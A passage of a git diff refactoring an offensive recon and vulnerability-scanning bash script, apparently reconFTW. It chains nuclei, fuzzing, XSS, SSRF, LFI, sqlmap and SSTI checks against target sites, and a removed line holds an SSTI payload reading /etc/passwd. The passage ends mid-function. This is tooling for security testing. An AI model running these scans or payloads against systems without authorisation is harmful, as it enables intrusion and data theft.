"${bgreen}#######################################################################\n" - printf "${bblue} Template Scanning with Nuclei ${reset}\n\n" - start=`date +%s` + start_func "Templates based web scanner" eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output printf "${yellow} Running : Nuclei Technologies${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -o nuclei_output/technologies.txt; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -o nuclei_output/technologies.txt printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -o nuclei_output/tokens.txt; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -o nuclei_output/tokens.txt printf "${yellow}\n\n Running : Nuclei Exposures${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -o nuclei_output/exposures.txt; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -o nuclei_output/exposures.txt printf "${yellow}\n\n Running : Nuclei CVEs ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -o nuclei_output/cves.txt; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -o nuclei_output/cves.txt printf "${yellow}\n\n Running : Nuclei Default Creds ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -o nuclei_output/default_creds.txt; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -o nuclei_output/default_creds.txt printf "${yellow}\n\n Running : Nuclei DNS ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -o nuclei_output/dns.txt; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -o nuclei_output/dns.txt printf "${yellow}\n\n Running : Nuclei Panels ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -o nuclei_output/panels.txt; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -o nuclei_output/panels.txt printf "${yellow}\n\n Running : Nuclei Security Misconfiguration ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -o nuclei_output/misconfigurations.txt; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -o nuclei_output/misconfigurations.txt printf "${yellow}\n\n Running : Nuclei Vulnerabilites ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -o nuclei_output/vulnerabilities.txt && touch $called_fn_dir/.${FUNCNAME[0]}; + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -o nuclei_output/vulnerabilities.txt printf "\n\n" - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Nuclei Scan Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in nuclei_output folder ${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else if [ "$NUCLEICHECK" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -784,10 +678,7 @@ function nuclei_check(){ function fuzz(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$FUZZ" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Directory Fuzzing ${reset}\n" - printf "${yellow}\n\n Fuzzing subdomains with ${fuzz_wordlist}${reset}\n\n" - start=`date +%s` + start_func "Web directory fuzzing" mkdir -p $dir/fuzzing for sub in $(cat webs/webs.txt); do printf "${yellow}\n\n Running: Fuzzing in ${sub}${reset}\n" @@ -796,13 +687,7 @@ function fuzz(){ eval cat $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR | jq '[.results[]|{status: .status, length: .length, url: .url}]' | grep -oP "status\":\s(\d{3})|length\":\s(\d{1,7})|url\":\s\"(http[s]?:\/\/.*?)\"" | paste -d' ' - - - | awk '{print $2" "$4" "$6}' | sed 's/\"//g' | sort |anew -q $dir/fuzzing/${sub_out}.txt eval rm $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR done - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Directory Fuzzing Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in fuzzing/*subdomain*.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in fuzzing/*subdomain*.txt" ${FUNCNAME[0]} else if [ "$FUZZ" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -815,9 +700,7 @@ function fuzz(){ function cms_scanner(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CMS_SCANNER" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} CMS Scanner ${reset}\n" - start=`date +%s` + start_func "CMS Scanner" mkdir -p $dir/cms && rm -rf $dir/cms/* tr '\n' ',' < webs/webs.txt > .tmp/cms.txt eval python3 $tools/CMSeeK/cmseek.py -l .tmp/cms.txt --batch -r $DEBUG_STD @@ -831,13 +714,7 @@ function cms_scanner(){ mv -f $tools/CMSeeK/Result/${sub_out} $dir/cms/ fi done - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n CMS Scanner finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in cms/*subdomain* folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in cms/*subdomain* folder" else if [ "$CMS_SCANNER" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -850,9 +727,7 @@ function cms_scanner(){ function params(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$PARAMS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Parameter Discovery ${reset}\n" - start=`date +%s` + start_func "Parameter Discovery" printf "${yellow}\n\n Running : Searching params with paramspider${reset}\n" cat webs/webs.txt | sed -r "s/https?:\/\///" | anew -q .tmp/probed_nohttp.txt interlace -tL .tmp/probed_nohttp.txt -threads 10 -c "python3 $tools/ParamSpider/paramspider.py -d _target_ -l high -q --exclude eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt,js" &>/dev/null @@ -861,22 +736,17 @@ function params(){ eval rm -rf output/ $DEBUG_ERROR if [ "$DEEP" = true ] ; then printf "${yellow}\n\n Running : Checking ${domain} with Arjun${reset}\n" - eval arjun -i .tmp/param_tmp.txt -t 20 -oT webs/param.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} + eval arjun -i .tmp/param_tmp.txt -t 20 -oT webs/param.txt $DEBUG_STD else if [[ $(cat .tmp/param_tmp.txt | wc -l) -le 50 ]] then printf "${yellow}\n\n Running : Checking ${domain} with Arjun${reset}\n" - eval arjun -i .tmp/param_tmp.txt -t 20 -oT webs/param.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} + eval arjun -i .tmp/param_tmp.txt -t 20 -oT webs/param.txt $DEBUG_STD else - cp .tmp/param_tmp.txt webs/param.txt && touch $called_fn_dir/.${FUNCNAME[0]} + cp .tmp/param_tmp.txt webs/param.txt fi fi - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Parameter Discovery Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in webs/param.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in webs/param.txt" ${FUNCNAME[0]} else if [ "$PARAMS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -887,11 +757,9 @@ function params(){ } function urlchecks(){ - if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_CHECK" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} URL Extraction ${reset}\n\n" - start=`date +%s` + start_func "URL Extraction" mkdir -p js cat webs/webs.txt | waybackurls | anew -q .tmp/url_extract_tmp.txt cat webs/webs.txt | gau | anew -q .tmp/url_extract_tmp.txt @@ -908,17 +776,8 @@ function urlchecks(){ cat .tmp/url_extract_tmp.txt | grep "${domain}" | egrep -i "\.(js)" | anew -q js/url_extract_js.txt eval uddup -u .tmp/url_extract_tmp2.txt -o .tmp/url_extract_uddup.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]}; - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n URL Extraction Finished\n" - printf "${text}" && printf "${text}" | $NOTIFY - if [ "$NUMOFLINES" -gt 0 ]; then - text="${bblue}\n ${NUMOFLINES} new urls in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi - printf "${bblue} Results are saved in webs/url_extract.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + notification "${NUMOFLINES} new urls in ${runtime}" good + end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -927,9 +786,7 @@ function urlchecks(){ function url_gf(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_GF" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Vulnerable Pattern Search ${reset}\n\n" - start=`date +%s` + start_func "Vulnerable Pattern Search" mkdir -p gf gf xss webs/url_extract.txt | anew -q gf/xss.txt gf ssti webs/url_extract.txt | anew -q gf/ssti.txt @@ -940,13 +797,7 @@ function url_gf(){ gf potential webs/url_extract.txt | cut -d ':' -f3-5 |anew -q gf/potential.txt cat webs/url_extract.txt | unfurl -u format %s://%d%p | anew -q gf/endpoints.txt gf lfi webs/url_extract.txt | anew -q gf/lfi.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Vulnerable Pattern Search Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in gf folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in gf folder" ${FUNCNAME[0]} else if [ "$URL_GF" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -959,9 +810,7 @@ function url_gf(){ function jschecks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$JSCHECKS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Javascript Scan ${reset}\n\n" - start=`date +%s` + start_func "Javascript Scan" printf "${yellow} Running : Fetching Urls 1/5${reset}\n" cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt @@ -973,13 +822,7 @@ function jschecks(){ cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -o js/js_secrets.txt $DEBUG_STD printf "${yellow} Running : Building wordlist 5/5${reset}\n" cat js/js_livelinks.txt | eval python3 $tools/getjswords.py $DEBUG_ERROR | anew -q webs/dict_words.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Javascript Scan Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in js folder${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in js folder" ${FUNCNAME[0]} else if [ "$JSCHECKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -992,14 +835,13 @@ function jschecks(){ function wordlist_gen(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WORDLIST" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Wordlist generation ${reset}\n\n" - start=`date +%s` + start_func "Wordlist generation" cat .tmp/url_extract_tmp.txt | unfurl -u keys | sed 's/[][]//g' | sed 's/[#]//g' | sed 's/[}{]//g' | anew -q webs/dict_words.txt cat .tmp/url_extract_tmp.txt | unfurl -u path | anew -q webs/dict_paths.txt touch $called_fn_dir/.${FUNCNAME[0]} - text="${bblue}\n Wordlists Generated\n" - printf "${text}" && printf "${text}" | $NOTIFY + end=`date +%s` + getElapsedTime $start $end + notification "Wordlists Generated in ${runtime}" info printf "${bblue} Results are saved in webs/dict_[words|paths].txt${reset}\n" printf "${bgreen}#######################################################################\n\n" else @@ -1017,21 +859,12 @@ function wordlist_gen(){ function brokenLinks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$BROKENLINKS" = true ] ; then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Broken links checks ${reset}\n\n" - start=`date +%s` - gospider -S webs/webs.txt --js -t 50 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep -v ".$domain" | httpx -status-code -follow-redirects -timeout 15 -silent -no-color | grep '\[404\]' | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt + start_func "Broken links checks" + interlace -tL webs/webs.txt -threads 10 -c "wget --spider -r -nd -nv -H -l 1 -w 1 --no-check-certificate -U 'Mozilla' -o _output_/_cleantarget__brokenLinks.tmp _target_" -o .tmp &>/dev/null + cat .tmp/*_brokenLinks.tmp | grep "^http" | grep -v ':$' | anew -q .tmp/brokenLinks_total.txt NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | cut -d ' ' -f2 | anew webs/brokenLinks.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${bred}\n ${NUMOFLINES} new broken links found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi - printf "${bblue}\n Broken links checks Finished in ${runtime}\n" - printf "${bblue} Results are saved in webs/brokenLinks.txt ${reset}\n" - printf "${bgreen}#######################################################################\n\n" + notification "${NUMOFLINES} new broken links found in ${runtime}" good + end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} else if [ "$BROKENLINKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1044,9 +877,7 @@ function brokenLinks(){ function xss(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$XSS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} XSS Analysis ${reset}\n\n" - start=`date +%s` + start_func "XSS Analysis" cat gf/xss.txt | qsreplace FUZZ | Gxss -c 100 -p Xss | anew -q .tmp/xss_reflected.txt if [ "$DEEP" = true ] ; then if [ -n "$XSS_SERVER" ]; then @@ -1070,12 +901,7 @@ function xss(){ printf "${bred} Skipping XSS: Too Much URLs to test, try with --deep flag${reset}\n" fi fi - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n XSS Analysis Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in vulns/xss.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in vulns/xss.txt" ${FUNCNAME[0]} else if [ "$XSS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1088,17 +914,10 @@ function xss(){ function cors(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CORS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} CORS Scan ${reset}\n\n" - start=`date +%s` + start_func "CORS Scan" eval python3 $tools/Corsy/corsy.py -i webs/webs.txt > webs/cors.txt $DEBUG_STD eval cat webs/cors.txt $DEBUG_ERROR && touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n CORS Scan Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in webs/cors.txt ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in webs/cors.txt" else if [ "$CORS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1111,40 +930,24 @@ function cors(){ function open_redirect(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$OPEN_REDIRECT" = true ] then + start_func "Open redirects checks" if [ "$DEEP" = true ] ; then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Open redirects checks ${reset}\n" - start=`date +%s` cat gf/redirect.txt | qsreplace FUZZ | anew -q .tmp/tmp_redirect.txt eval python3 $tools/OpenRedireX/openredirex.py -l .tmp/tmp_redirect.txt --keyword FUZZ -p $tools/OpenRedireX/payloads.txt $DEBUG_ERROR | grep "^http" > vulns/redirect.txt sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" vulns/redirect.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Open Redirects Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in vulns/openredirex.txt ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in vulns/openredirex.txt" ${FUNCNAME[0]} else if [[ $(cat gf/redirect.txt | wc -l) -le 1000 ]] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Open redirects checks ${reset}\n" - start=`date +%s` cat gf/redirect.txt | qsreplace FUZZ | anew -q .tmp/tmp_redirect.txt eval python3 $tools/OpenRedireX/openredirex.py -l .tmp/tmp_redirect.txt --keyword FUZZ -p $tools/OpenRedireX/payloads.txt $DEBUG_ERROR | grep "^http" > vulns/redirect.txt sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" vulns/redirect.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Open Redirects Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in vulns/redirect.txt ${reset}\n" + end_func "Results are saved in vulns/openredirex.txt" ${FUNCNAME[0]} else printf "${bred} Skipping Open redirects: Too Much URLs to test, try with --deep flag${reset}\n" + printf "${bgreen}#######################################################################\n" fi fi - printf "${bgreen}#######################################################################\n" else if [ "$OPEN_REDIRECT" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1157,11 +960,9 @@ function open_redirect(){ function ssrf_checks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SSRF_CHECKS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} SSRF checks ${reset}\n" if [ -n "$COLLAB_SERVER" ]; then + start_func "SSRF checks" if [ "$DEEP" = true ] ; then - start=`date +%s` cat gf/ssrf.txt | qsreplace FUZZ | anew -q .tmp/tmp_ssrf.txt COLLAB_SERVER_FIX=$(echo $COLLAB_SERVER | sed -r "s/https?:\/\///") echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt @@ -1169,19 +970,11 @@ function ssrf_checks(){ for url in $(cat .tmp/tmp_ssrf.txt); do ffuf -v -H "${HEADER}" -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt done - eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt - - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n SSRF Finished in ${runtime}, check your callback server\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in ssrf_confirmed.txt ${reset}\n" + end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} else if [[ $(cat gf/ssrf.txt | wc -l) -le 1000 ]] then - start=`date +%s` cat gf/ssrf.txt | qsreplace FUZZ | anew -q .tmp/tmp_ssrf.txt COLLAB_SERVER_FIX=$(echo $COLLAB_SERVER | sed -r "s/https?:\/\///") echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt @@ -1190,20 +983,15 @@ function ssrf_checks(){ ffuf -v -H "${HEADER}" -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt done eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n SSRF Finished in ${runtime}, check your callback server\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in vulns/ssrf.txt ${reset}\n" + end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} else printf "${bred} Skipping SSRF: Too Much URLs to test, try with --deep flag${reset}\n" fi fi else printf "${bred}\n No COLLAB_SERVER defined\n" + printf "${bgreen}#######################################################################\n" fi - printf "${bgreen}#######################################################################\n" else if [ "$SSRF_CHECKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1216,16 +1004,9 @@ function ssrf_checks(){ function crlf_checks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CRLF_CHECKS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} CRLF checks ${reset}\n" - start=`date +%s` - eval crlfuzz -l webs/webs.txt -o vulns/crlf.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n CRLF Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in crlf.txt ${reset}\n" - printf "${bgreen}#######################################################################\n" + start_func "CRLF checks" + eval crlfuzz -l webs/webs.txt -o vulns/crlf.txt $DEBUG_STD + end_func "Results are saved in vulns/crlf.txt" ${FUNCNAME[0]} else if [ "$CRLF_CHECKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1238,20 +1019,12 @@ function crlf_checks(){ function lfi(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$LFI" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} LFI checks ${reset}\n" - start=`date +%s` + start_func "LFI checks" cat gf/lfi.txt | qsreplace FUZZ | anew -q .tmp/tmp_lfi.txt for url in $(cat .tmp/tmp_lfi.txt); do ffuf -v -mc 200 -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt done - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n LFI Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in lfi.txt ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in vulns/lfi.txt" ${FUNCNAME[0]} else if [ "$LFI" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1264,23 +1037,12 @@ function lfi(){ function ssti(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SSTI" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} SSTI checks ${reset}\n" - start=`date +%s` - + start_func "SSTI checks" cat gf/ssti.txt | qsreplace "ssti{{7*7}}" | anew -q .tmp/ssti_fuzz.txt ffuf -v -mc 200 -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "ssti49" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt - cat gf/ssti.txt | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | anew -q .tmp/ssti_fuzz2.txt ffuf -v -mc 200 -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt - - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n SSTI Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in ssti.txt ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in vulns/ssti.txt" ${FUNCNAME[0]} else if [ "$SSTI" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1293,18 +1055,10 @@ function ssti(){ function sqli(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SQLI" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} SQLi checks ${reset}\n" - start=`date +%s` + start_func "SQLi checks" cat gf/sqli.txt | qsreplace FUZZ | anew -q .tmp/tmp_sqli.txt interlace -tL .tmp/tmp_sqli.txt -threads 10 -c "python3 $tools/sqlmap/sqlmap.py -u _target_ -b --batch --disable-coloring --random-agent --output-dir=sqlmap" &>/dev/null - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n SQLi Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in sqlmap folder ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in sqlmap folder" ${FUNCNAME[0]} else if [ "$SQLI" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1317,16 +1071,9 @@ function sqli(){ function test_ssl(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$TEST_SSL" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} SSL Test ${reset}\n" - start=`date +%s` + start_func "SSL Test" eval $tools/testssl.sh/testssl.sh --quiet --color 0 -U -iL hosts/ips.txt $DEBUG_ERROR > hosts/testssl.txt && touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n SSL Test Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in hosts/testssl.txt ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in hosts/testssl.txt" ${FUNCNAME[0]} else if [ "$TEST_SSL" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -1384,6 +1131,123 @@ function output(){ mv $dir $dir_output } +function notification(){ + if [ ! -z "$1" ] && [ ! -z "$2" ] + then + case $2 in + info) + text="\n${bblue} ${1} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + ;; + warn) + text="\n${yellow} ${1} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + ;; + error) + text="\n${bred} ${1} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + ;; + good) + text="\n${bgreen} ${1} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + ;; + esac + fi +} + +function start_func(){ + printf "${bgreen}#######################################################################\n" + notification "${1}" info + start=`date +%s` + start_spinner +} + +function end_func(){ + touch $called_fn_dir/.${2} + end=`date +%s` + getElapsedTime $start $end + stop_spinner + notification "${2} Finished in ${runtime}" info + printf "${bblue} ${1} ${reset}\n" + printf "${bgreen}#######################################################################\n" +} + +function start_subfunc(){ + notification "${1}" warn + start_sub=`date +%s` + start_spinner +} + +function end_subfunc(){ + touch $called_fn_dir/.${2} + end_sub=`date +%s` + getElapsedTime $start_sub $end_sub + stop_spinner + notification "${1} in ${runtime}" good +} + +function _spinner() { + # $1 start/stop + # + # on start: $2 display message + # on stop : $2 process exit status + # $3 spinner function pid (supplied from stop_spinner) + + local on_success="DONE" + local on_fail="FAIL" + local white="\e[1;37m" + local green="\e[1;32m" + local red="\e[1;31m" + local nc="\e[0m" + + 